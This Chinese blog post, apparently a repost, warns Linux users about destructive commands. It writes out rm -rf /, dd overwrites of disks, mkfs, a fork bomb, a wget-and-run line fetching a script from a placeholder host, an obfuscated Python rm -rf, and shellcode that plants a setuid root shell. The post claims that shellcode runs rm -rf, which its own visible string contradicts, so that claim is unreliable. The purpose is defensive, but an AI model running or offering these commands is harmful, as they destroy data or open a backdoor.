早晚有一天,Linux 系统会像 Windows 那样流行,在 Linux 给你最大程度自由度的同时,也使得破坏系统变得更加容易,如果你不了解某些命令的意义,下载执行包含恶意命令的脚本,或者被骗运行某些命令,很容易让你哭都来不及。
编者注:文中列出的命令绝对不可以运行,即使你觉得很好奇也不行,除非你是在虚拟机上运行(出现问题你可以还原),因为它们会实实在在的破坏你的系统。所以不在root等高级管理权限下执行命令是很好的习惯。
早晚有一天,Linux 系统会像 Windows 那样流行,用的人越来越多,包括对计算机不是很了解的人,本文的目的就是告诉大家:在 Linux 给你最大程度自由度的同时,也使得破坏系统变得更加容易,如果你不了解某些命令的意义,下载执行包含恶意命令的脚本,或者被骗运行某些命令,很容易让你哭都来不及。
这并不是说明 Linux 不安全,只是说明在不了解 Linux ,和很不小心的人面前,Linux 十分不安全。Windows 也好,Linux 也好,人本身才是最大的不安全因素。
下面的命令会删除你硬盘上的文件,rm 的 -r 递归删除,和 -f 强制删除是很危险的选项,即使日常操作,也会遇到误删文件的情况。
sudo rm -rf /  删除根分区全部的文件
sudo rm -rf .    删除当前目录下的所有文件
sudo rm -rf *   同上
rm -rf * or rm -rf *.*   同上
rm -rf ~ / &     删除根分区和家目录,即使你不是root,家目录还是不能幸免。
同样,如果你不知道 mkfs.xxxx (xxxx 可以是 vfat、ext2、ext3、bfs……) 是格式化命令的话,运行下面的命令会擦除你的硬盘分区:
sudo mkfs.xxxx
dd 是强大的 IO 输入输出定向工具,如果使用不当,破坏性很大,不仅仅是当前分区,当前系统,有的时候是整个硬盘。
sudo dd if=/dev/zero of=/dev/sda   全部硬盘清零。
sudo dd if=/dev/sda of=/dev/sdb     用第一块硬盘的内容覆盖第二块的内容。
sudo dd if=something of=/dev/sda    往硬盘上写垃圾数据。
同理,直接把命令结果定向到硬盘上,相当于往硬盘上写垃圾数据:
any_command > /dev/sda              用随意的数据破坏硬盘
上面的 sda 、sdb 也可能是其他类似的名称。Linux 的 /dev 系统给操纵硬件提供了很方便和强大的功能,同时也使得破坏变得更容易。
fork 命令打开一个子进程,如果把 fork 放在无限循环中,最终子进程会耗尽所有内存资源:
:(){:|:&};: 
这段不知所云的符号,可以让 Shell 不停的 fork 子进程,最后导致内存耗尽,不得不重启,这不是 bug,只是 Shell 语句故意写成简写的形式而已。下面的同理:
fork while fork
有的时候,压缩包也是一个破坏来源~
有的压缩包要求你解压到某个系统中已经存在的目录中,这时候你就要特别小心了,压缩包里面可能有成千上万的小文件,以各种文件名尝试覆盖你现有的文件。
有的压缩包看起来很小,但是解压出来是上 GB 的垃圾数据,会充斥你的硬盘。
从不正规网站下载的程序、脚本,同样会有包含恶意命令的危险,不可随便执行:
wget http://some_place/some_file
sh ./some_file
wget http://hax018r.org/malicious-script
sh ./malicious-script
载脚本要确保来源正规,如果有能力,可以阅读其代码。
即使有源代码的程序,也不要随便编译执行:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
上面看起来只是一堆没有意义的 16 进制数据,如果有人告诉你,运行这个程序你就可以不输入密码取得系统的 root 权限,你可不要相信他,上面的程序实际运行的是“rm -rf ~ / & ”。
python 一类的脚本语言,同样可以拿来搞破坏:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg! "]))'
这段程序实际上会执行 rm -rf *,也许你很奇怪上面程序结尾的 “sn!.sg! ” 是什么意思,实际上就是 rm -rf * 每个字母的下一个!
那么我们如何避免运行恶意程序呢?
第一不要用 root 作为日常使用的用户,上面的程序,如果当前用户不是 root,危害的波及范围就会小很多。
第二要知道哪些命令是干什么用的,不知道的命令不要冒然运行。运行有潜在破坏能力的程序,要小心检查自己的输入。
第三要保证软件、脚本的来源正规。
最后一点,虽然比较消极,但是确实十分重要的一点:
经常备份你的数据!!

转载于:https://blog.51cto.com/584250550/1175863

极具破坏力的Linux系统命令相关推荐

  1. 7个极具杀伤性的Linux命令

    [转载]7个极具杀伤性的Linux命令 原始出处:cnbeta.com 如果您使用Linux,可千万要记得不要让傻孩子们敲入以下命令,尽管这些命令看上去相当复杂,但还是会对你的系统造成严重影响. 有一 ...

  2. python画害羞的表情_如何绘制面部表情?教你绘制极具吸引力的面部表情画法技巧!...

    原标题:如何绘制面部表情?教你绘制极具吸引力的面部表情画法技巧! 如何绘制面部表情?人物表情怎么画?自学绘画难吗?想必这些都是绘画初学者们经常在想的问题吧,就是不知道如何才能学习好绘画,然后绘画出自己 ...

  3. 阿里云视频云全景创新峰会——视频云,一个极具想象力的赛道

    7月10日,"Imagine"--2021阿里云视频云全景创新峰会暨全球视频云创新挑战赛决赛颁奖典礼在北京举办.本次峰会由阿里云联合Intel主办,与优酷战略技术合作,天池平台及阿 ...

  4. 经典网页设计:30个极具吸引力的网页设计作品

    使用醒目的颜色组合是一种常见的广告策略,因为它有助于快速捕捉观众的注意力.同样的方法也适用于在网上行业,例如广告横幅和宣传单,但它也可用于网站建设. 有许多研究表明用户对某些颜色有特别的亲和力,因此, ...

  5. 70+漂亮且极具亲和力的导航菜单设计推荐

    网站可用性是任何网站的基本要素,而可用的导航更是网站所必需的要素之一.导航决定了用户如何与网站进行交互.如果没有了可用的导航,那么网站内容就会变得毫无用处.导航菜单应当足够简单以让用户快速了解它,但还 ...

  6. 70 漂亮且极具亲和力的导航菜单设计推荐

    网站可用性是任何网站的基本要素,而可用的导航更是网站所必需的要素之一.导航决定了用户如何与网站进行交互.如果没有了可用的导航,那么网站内容就会变得毫无用处.导航菜单应当足够简单以让用户快速了解它,但还 ...

  7. 流行趋势:打造极具吸引力的网页导航设计

    为了让你的网站脱颖而出,不仅需要有丰富的高质量的内容,同时也要兼顾网站的创新性和功能性.从用户的角度出发好好想一下,怎样让你的网站用户体验更友好?简单的搜索功能是需要的,或者你也可以精心设计一下网站的 ...

  8. 七招教你如何取好极具吸引力的文案标题

    我们在写文案的时候都会在标题上花费非常多的时间,因为标题就直接影响了这篇文案的爆款程度,大家在手机上看到的推送都是先标题再看到文案,所以可见标题的重要性,在这里给大家分享一下如何取好标题. 标题的加分 ...

  9. 2020 年最具潜力的 44 个顶级开源项目,涵盖 11 类 AI 学习框架、平台(附链接)...

    来源:AI开发者 本文约为7600字,建议阅读10分钟 本文给开发者提供了详细的各领域工具并整理了清单11 种极具潜力的 AI 工具类型. 工欲善其事必先利其器,这也是大部分开发者在日常工作中最重要开 ...

  10. 2020 年最具潜力的 44 个顶级开源项目

    来源:AI开发者 本文约为7600字,建议阅读10分钟 本文给开发者提供了详细的各领域工具并整理了清单11 种极具潜力的 AI 工具类型. 工欲善其事必先利其器,这也是大部分开发者在日常工作中最重要开 ...

最新文章

  1. 对话高博(二)| 换工作这件事
  2. 因肠道疾病经常上厕所,她被亚马逊解雇了
  3. 关于vs生成app错误提示,提醒Execution failed for task ':transformClassesWithDexForDebug'.
  4. exit和return区别
  5. Windows平台下sbt的安装设置
  6. 五环 html css,CSS + radius 五环
  7. xp 系统 mysql日志文件在哪里_SqlServer修改数据库文件及日志文件存放位置教程
  8. pytorch--- .zero_grad()
  9. 拓端tecdat|R语言分层线性模型案例
  10. 【Todo】已经打开的页面需要清掉的坑
  11. JavaSE,JavaEE,JavaME区别
  12. android 上拉抽屉,Flutter上拉抽屉实现
  13. 计算机桌面没有cd驱动器,win10没有cd驱动器怎么办_win10不显示dvd驱动器的解决方法...
  14. LZJ流体质量计算机价格,LZJ-ⅢC型流体质量计算机全解.doc
  15. 活动倒计时的一些想法
  16. java设置北京时间的时区
  17. java script实训心得_javascript实训报告总结.docx
  18. 什么是情绪分析?基本指南
  19. 配置tomcat下载sis,sisx文件
  20. 我的周刊(第017期)

热门文章

  1. 【转】SQL Server联机丛书:存储过程及其创建
  2. Final Cut Pro X for Mac有哪些新功能?Final Cut Pro X Mac版怎么样?
  3. Linux的学习之路grep命令
  4. Spring(16)——使用注解进行bean定义
  5. I/O多路复用之select
  6. 【Linux安全】chattr命令锁定账户敏感文件
  7. Netty5 Write和Flush事件处理过程_源码讲解
  8. Asp.Net中的三种分页方式总结
  9. 二叉树:一入递归深似海,从此offer是路人
  10. Illustrator 教程,如何在 Illustrator 中对矢量图进行变形、定形和塑形?